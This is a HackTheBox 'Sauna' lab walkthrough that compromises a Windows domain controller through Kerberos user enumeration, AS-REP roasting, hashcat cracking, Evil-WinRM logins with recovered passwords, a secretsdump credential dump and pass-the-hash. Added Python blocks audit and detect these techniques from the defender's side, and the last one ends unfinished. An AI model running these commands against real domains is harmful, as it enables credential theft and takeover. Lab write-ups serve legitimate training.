HTB Sauna Walkthrough
Welcome to the HackTheBox Sauna walkthrough, a technical how-to guide to hacking the Sauna box.
Welcome to another of my HTB walkthroughs! I found Sauna to be a really onerous machine. I don't mean difficult, because difficulty is relative: what is complex for me can be simple for others. I'm at the beginning and still a newbie in this area, and I have much more to learn, but if you are here to read this tutorial, we are probably in the same boat. Let's jump right in!
We start off with our usual nmap command:
nmap -p 1-65535 -T4 -A -v 10.10.10.175
I report only the list of open ports:
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-15 00:15:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap?
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open unknown
49673/tcp open unknown
49675/tcp open unknown
49686/tcp open unknown
55454/tcp open unknown
My first approach was to search the identified ports on exploit-db. Nothing in particular to highlight, lots of exploits, but I need a direction. There's a web portal on the server, running on IIS, and this could be another attack point. Looking at it, I found on the about page some employees of the company (name and surname).
I start to have an idea, confirmed after reading the forum. These people may have an account on the machine; we just have to work out the username used for each one. We can prepare a list of usernames built with the standard rules usually used to create a domain account (name.surname, the first letter of the name and the full surname, and so on). Well, I also put in the standard users (administrator, guest, etc.) and in the end my list was about 150 records.
At this point I start brute-forcing with the smb_login module of the Metasploit Framework, but, after many tries, I got nowhere. I tried different dictionaries, but nothing. I repeat the module, thinking I had missed some output from the console. Nothing. So I go and read the forum for tips, and I read the simplest sentence, one that made no sense but "turned on" the light; something like "nice hint on the picture". Looking at the picture you can read the number 88, so I understand that I have to concentrate on that port. But on port 88 there is a Kerberos service, so I proceed to identify a possible exploit for it.
msf5 > search kerbero
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal No MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
1 auxiliary/gather/get_user_spns 2014-09-27 normal No Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)
2 auxiliary/gather/kerberos_enumusers normal No Kerberos Domain User Enumeration
3 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility
4 post/windows/escalate/golden_ticket normal No Windows Escalate Golden Ticket
Really good, five modules and the third one attracts my attention: "enumeration". I don't lose any more time: I study this module and use it. During the execution everything works fine until the process arrives at the username "fsmith", which produces an error. I try again, but the process stops at exactly this user, so I truncated the list and continued with the enumeration. No other user produces an error. I understand that this is probably my attack point (it should be an error in the script that I would have to correct, but let's go on for now).
msf5 > use auxiliary/gather/kerberos_enumusers
msf5 auxiliary(gather/kerberos_enumusers) > options
Module options (auxiliary/gather/kerberos_enumusers):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The Domain Eg: demo.local
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER_FILE yes Files containing usernames, one per line
msf5 auxiliary(gather/kerberos_enumusers) > set domain .
domain => .
msf5 auxiliary(gather/kerberos_enumusers) > set rhosts 10.10.10.175
rhosts => 10.10.10.175
msf5 auxiliary(gather/kerberos_enumusers) > set user_file work-on-this.txt
user_file => work-on-this.txt
msf5 auxiliary(gather/kerberos_enumusers) >
[...]
[*] Using domain: EGOTISTICALBANK...
[*] 10.10.10.175:88 - Testing User: "fsmith"...
[-] Auxiliary failed: NoMethodError undefined method `error_code' for #<Rex::Proto::Kerberos::Model::KdcResponse:0x000055a3a6e83b00>
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:74:in `block in run'
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `each'
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `run'
[*] Auxiliary module execution completed
Ok, I have an account and a DOMAIN name (you can see it at the start of the process), but I have to understand how to attack the Kerberos service. I search on Google for a little while and finally I found this: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/. Good, my next tool will be impacket.
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack/impacket/examples$ sudo python3 GetNPUsers.py EGOTISTICALBANK/fsmith -format hashcat -outputfile ../../fsmith.hash -dc-ip 10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[*] Cannot authenticate fsmith, getting its TGT
$krb5asrep$23$fsmith@EGOTISTICALBANK:d2c96f571f61f3bd4a076921c435cf32$c9b239a5aa12b5bb81981651f87cb3f9837d20a713167932f90d5213cb07528fb714cff2189f57496b3fc695c070a719632816abfd0eede593dce8f9d1d1fe41debd87a2bef58337429c6a681f1f08163c74499ffba1d12e6ffa91418f0107ca047b795926473b49f02c530f5bcd2804438b45fc8dbc9ff67c3a5eaed8dd9bcf3011ba7c79212810ae4abc43a0643cf3cae58967b6e0f61ac4d690020b42a039f1f234d2e61e627876fbc1b51a280ffdeea9a10665af99dae5e094d1d96894a60f63bb634e3cdcb2eadf471e09a74c2005a4a4cac0c3131fac78938f51eb16b699bb335a0a1225c3226664574e2c40b6596ad5abc8a27de7ee
I used the command in the first form I found and it asks me for the password of the user; when I press enter without a password, the tool automatically retrieves the TGT hash. To be precise, the command could be launched with the -request parameter and it immediately takes what you need.
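What GetNPUsers.py is taking advantage of is a per-account setting: the DONT_REQ_PREAUTH bit (0x400000) of the userAccountControl attribute, which lets anyone who knows the username ask the KDC for an AS-REP for that user and crack its encrypted part offline. As an added example that is not part of this walkthrough, the Python below shows how a defender decodes that bitmask and lists the affected accounts. The directory entries are constructed (the post only establishes that fsmith has the bit set; the flag values for the other accounts are assumptions), and the LDAP filter and PowerShell query in the comments are the live equivalents against a real DC.

```python
# Added example, not part of the original walkthrough: decode the
# userAccountControl bitmask to find accounts that can be AS-REP roasted,
# i.e. enabled accounts with DONT_REQ_PREAUTH set. The entries below are
# constructed; the post only establishes that fsmith has the flag set.

UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x000002
DONT_REQ_PREAUTH = 0x400000

# Equivalent live query against the DC (not run here), using the
# LDAP_MATCHING_RULE_BIT_AND rule 1.2.840.113556.1.4.803:
#   (&(userAccountControl:1.2.840.113556.1.4.803:=4194304)
#     (!(userAccountControl:1.2.840.113556.1.4.803:=2)))
# or, with the AD PowerShell module:
#   Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true'


def decode_uac(value):
    """Names of the known flag bits set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def find_asrep_roastable(entries):
    """sAMAccountNames of enabled accounts that do not require pre-authentication."""
    hits = []
    for entry in entries:
        uac = int(entry["userAccountControl"])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(entry["sAMAccountName"])
    return hits


# Constructed directory entries (sAMAccountName, userAccountControl).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "Administrator",  "userAccountControl": 0x010200},
    {"sAMAccountName": "fsmith",         "userAccountControl": 0x410200},  # pre-auth disabled
    {"sAMAccountName": "hsmith",         "userAccountControl": 0x010200},
    {"sAMAccountName": "svc_loanmgr",    "userAccountControl": 0x010200},
    {"sAMAccountName": "old_contractor", "userAccountControl": 0x400202},  # flag set, but disabled
]

if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        print(entry["sAMAccountName"], decode_uac(entry["userAccountControl"]))
    print("AS-REP roastable:", find_asrep_roastable(SAMPLE_ENTRIES))
```

The disabled account is in the sample on purpose: it carries the flag but cannot be roasted, so an audit that ignores ACCOUNTDISABLE over-reports. The fix is simply to clear "Do not require Kerberos preauthentication" on the account; where an old application really needs it, a long random password and AES-only keys on that account at least remove the fast RC4 (etype 23) case that hashcat mode 18200 cracks.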
Moving forward, there are two different tools you can use to crack a hash, John the Ripper or hashcat; I prefer the second one.
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ hashcat -m 18200 --force -a 0 fsmith.hash /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1024/2900 MB allocatable, 2MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.e76a9994.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s
$krb5asrep$23$fsmith@EGOTISTICALBANK:25834f0ffe3b173de8636f4cbb2874ed$20fa322b00d05c32855ea95415e62e5c722def4c3c43f0bc7812b5785655c1d039ceb1cd753acb618ae27bcb6e35179f6d8e43e8806a6504245659728984395308b176ee9cff499c07ee378feef8b5225ea2212e5578096efbc64a542c44493b602f4b159283fed9206a3c0871b84926b4a039217239db4d5ce3efacc9b179150b736a724839e1e5726304ad500cf9287c350cb555e545342c9fd5fedc1436c65f5ab122c44ef0a80b260099e14caa771d48b131adffa03073a1ac21c1a97891cb4f6fa70977d8175cd80cf093518dfc2b2fa7703a2d4436b0eea7899525556267e0571d2b4656b372bbee9ea0e7cd3d5b900f65aed45010d1:Thestrokes23
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICALBANK:25834f0ffe3b17...5010d1
Time.Started.....: Sat Mar 21 14:21:32 2020 (1 min, 28 secs)
Time.Estimated...: Sat Mar 21 14:23:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 120.9 kH/s (10.32ms) @ Accel:32 Loops:1 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10534912/14344385 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tioncurtis23 -> Thelittlemermaid
Started: Sat Mar 21 14:21:10 2020
Stopped: Sat Mar 21 14:23:01 2020
The number 18200 I use in the command is the hash mode, which tells hashcat which algorithm to use to recover the password, based on the table reported on this page https://hashcat.net/wiki/doku.php?id=example_hashes.
Ok, I have a username, a password and a Windows machine... Evil-WinRM.
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\fsmith -p 'Thestrokes23' -s '/ps1_scripts/' -e '/exe_files/'
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents>
*Evil-WinRM* PS C:\Users\FSmith\Documents> pwd
Path
----
C:\Users\FSmith\Documents
*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ..
Directory: C:\Users\FSmith
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/23/2020 10:01 AM Desktop
d-r--- 3/21/2020 1:49 PM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 3/21/2020 1:17 PM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ../Desktop
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Documents> type ../Desktop/user.txt
1******************************f
And the first flag is mine! After this, I lose a huge amount of time understanding what I have to do. I navigated through the folders searching for some information left unsecured, executed the whoami command, searched hidden folders, tried to execute commands on the machine, exported the SYSTEM hive from the HKLM registry to try to attack the ntds.dit file, and so on, but nothing. I have to go back to the forum (yeah, I know I'm a bit lazy) and found a useful tip, a comment that mentioned the tool w**PEAS... We are working on a Windows machine, so it's not so hard to understand that the full name of the tool is probably winPEAS (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite). I'm right. So again, I proceed to study the tool and run it.
Well, I download the tool and upload it to the remote machine through the related command of Evil-WinRM. The tool took a long time to extract the information from the machine. I was impressed with the amount of information it managed to extract, and it took me a long time to read the whole report, but in the end I found something interesting.
[...]
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] Files an registry that may contain credentials <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Searching specific files that may contains credentias.
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DefaultPassword REG_SZ Moneymakestheworldgoround!
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP
[...]
This user could be used for some service autostart or to log into the machine automatically, but this is not important; what is important is that I have another password. But there's something strange: the user is not the one I found in the Users folder of the machine.
*Evil-WinRM* PS C:\Users\FSmith\Documents> ls ../..
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/25/2020 1:05 PM Administrator
d----- 1/23/2020 9:52 AM FSmith
d-r--- 1/22/2020 9:32 PM Public
d----- 1/24/2020 4:05 PM svc_loanmgr
Anyway, I have to try and understand if it is a valid password or not.
in7rud3r@kali:/home/foo/data$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\svc_loanmanager -p 'Moneymakestheworldgoround!' -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r:
Swipe your right index finger across the fingerprint reader
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
As I supposed, I try the user I think is the real one.
in7rud3r@kali:/home/foo/data$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\svc_loanmgr -p 'Moneymakestheworldgoround!' -s '/ps1_scripts/' -e '/exe_files/'
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
Great, but I'm not the administrator. So again I spend a lot of time understanding what I need to do to go on and complete the machine. This time the forum doesn't help me (but I was concentrating on the wrong post). Someone was suggesting using the BloodHound tool to investigate the machine's entities; from the official GitHub page, "BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment".
I download it, install it, use it, upload a file to export information from the remote machine, import it into the tool and dig into the graph of the machine, searching for useful information. I certainly found something interesting: this is an alternative path to the final solution I adopted to take the second flag, but in my case what I found didn't work for me. I don't know if the exploit that this tool suggested to me was the correct one (mimikatz). I tried to use it in all ways, but it stops with errors (something related to the PowerShell I was connected to, I suppose), so I have to search for another way. The forum suggests two simple words that drive me to the right decision: secret and dump. I identify secretsdump.py, another tool of the impacket kit.
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack/impacket/examples$ sudo python secretsdump.py EGOTISTICALBANK/svc_loanmgr:"Moneymakestheworldgoround!"@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:8914a5faf0ea6625c5793685b8055117:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:83a8b70cc5c7c52c671dffc79a6adce3f51146b482011f6638ce8b79088823ab
SAUNA$:aes128-cts-hmac-sha1-96:e54efb10e8049b98e008163080244446
SAUNA$:des-cbc-md5:6837e9a2ea0852bc
[*] Cleaning up...
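From the defender's side, a dump like the one above is worth reading for more than the Administrator hash. As an added example that is not part of this walkthrough, the Python below parses secretsdump's user:rid:lmhash:nthash::: lines (the sample lines are copied from the output above; the Kerberos key line and the status line are included only to show that the parser skips them) and reports accounts that share an NT hash, accounts whose NT hash is that of an empty password, and accounts that still have an LM hash stored. NT hashes are unsalted, so HSmith and FSmith having the same NT hash means they have the same password, which is the kind of reuse an audit should flag without cracking anything.

```python
import re
from collections import defaultdict

# Added example, not part of the original walkthrough: read secretsdump-style
# "user:rid:lmhash:nthash:::" lines and flag what a defender should act on.
# The sample lines are copied from the dump shown in the post; the key line
# and the status line are there only to show that the parser ignores them.

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "", i.e. no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "", i.e. an empty password

LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_dump_line(line):
    """Return {user, rid, lm, nt} for a hash line, or None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"user": m.group("user"), "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(), "nt": m.group("nt").lower()}


def analyze_dump(lines):
    """Group accounts by NT hash (same hash means same password, since NT
    hashes are unsalted) and flag empty passwords and stored LM hashes."""
    by_nt = defaultdict(list)
    blank, lm_stored = [], []
    for line in lines:
        rec = parse_dump_line(line)
        if rec is None:
            continue
        by_nt[rec["nt"]].append(rec["user"])
        if rec["nt"] == EMPTY_NT:
            blank.append(rec["user"])
        if rec["lm"] != EMPTY_LM:
            lm_stored.append(rec["user"])
    return {
        "reused": {h: users for h, users in by_nt.items() if len(users) > 1},
        "blank_password": blank,
        "lm_hash_stored": lm_stored,
    }


# Lines copied from the secretsdump output in the post (plus one key line and
# the status line, which the parser must skip).
SAMPLE_DUMP = [
    "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::",
    "EGOTISTICAL-BANK.LOCAL\\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::",
    "EGOTISTICAL-BANK.LOCAL\\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::",
    "EGOTISTICAL-BANK.LOCAL\\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::",
    "SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:8914a5faf0ea6625c5793685b8055117:::",
    "Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031",
]

if __name__ == "__main__":
    for key, value in analyze_dump(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

The blank-password hit on Guest is expected on a default domain (the account is normally disabled); the dump carries no enabled/disabled state, so cross-check such hits against userAccountControl before raising them. The same grouping is how a defender compares a full NTDS dump against a corpus of known-breached NT hashes without ever handling the cleartext.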
More hashes to crack; we already used hashcat above, so let's go back to the table with the hash modes to identify the right one and proceed (#1000).
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175/attack$ hashcat -m 1000 -a 0 --force admin.hash /usr/share/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1024/2900 MB allocatable, 2MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: NTLM
Hash.Target......: d9485863c1e9e05851aa40cbb4ab9dff
Time.Started.....: Sun Mar 22 18:23:29 2020 (15 secs)
Time.Estimated...: Sun Mar 22 18:23:44 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1030.5 kH/s (0.73ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Started: Sun Mar 22 18:23:26 2020
Stopped: Sun Mar 22 18:23:45 2020
What? An unexpected surprise! Now what? I have to try other dictionaries, but then I think it would be nice if I could use the hash directly to connect to the machine, so, a fast check on the Evil-WinRM tool and... Fantastic, I can!
in7rud3r@kali:~/Dropbox/hackthebox/_Sauna - 10.10.10.175$ sudo docker run --rm -ti --name evil-winrm-2 -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.175 -u EGOTISTICALBANK\\Administrator -H d9485863c1e9e05851aa40cbb4ab9dff -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r:
Swipe your right index finger across the fingerprint reader
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
---------------------------------------------------------
*Evil-WinRM* PS C:\Users\Administrator\Documents> more ../Desktop/root.txt
f******************************f
That's the last flag! But let me say that this was a really complex machine for me this time, a real sauna!
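To close from the blue-team side: the Kerberos techniques used in this walkthrough each leave a distinctive footprint in the domain controller's Security log. The kerberos_enumusers run produces a burst of 4768 events with result code 0x6 (unknown principal) from one client address; GetNPUsers.py produces a 4768 with Pre-Authentication Type 0 and Ticket Encryption Type 0x17; and secretsdump's DRSUAPI method is a DCSync, which shows up as a 4662 in which a non-DC account exercises the DS-Replication-Get-Changes rights (this needs directory service access auditing enabled). The Python below is an added example, not part of the walkthrough; the events are constructed dicts whose field names follow the native events, and the client addresses and the alert threshold are assumptions.

```python
from collections import Counter

# Added example, not part of the original walkthrough. Detection logic for the
# Kerberos techniques used on this box, run over constructed Security-log events.
# Field names follow the native Windows events 4768 (a Kerberos TGT was requested)
# and 4662 (an operation was performed on an AD object); the values are made up.

# Extended rights that directory replication (and therefore DCSync) requires.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"  # 4768 result code when the user does not exist


def is_asrep_roast(ev):
    """TGT issued with no pre-authentication (type 0) and an RC4 (0x17)
    encrypted part: the AS-REP that GetNPUsers.py hands to hashcat mode 18200."""
    return (ev["EventID"] == 4768 and ev["Status"] == "0x0"
            and ev["PreAuthType"] == 0
            and ev["TicketEncryptionType"].lower() == "0x17")


def is_dcsync(ev, replication_accounts=frozenset()):
    """A replication right exercised by something other than a domain controller
    (computer accounts end in $) or an allow-listed replication account."""
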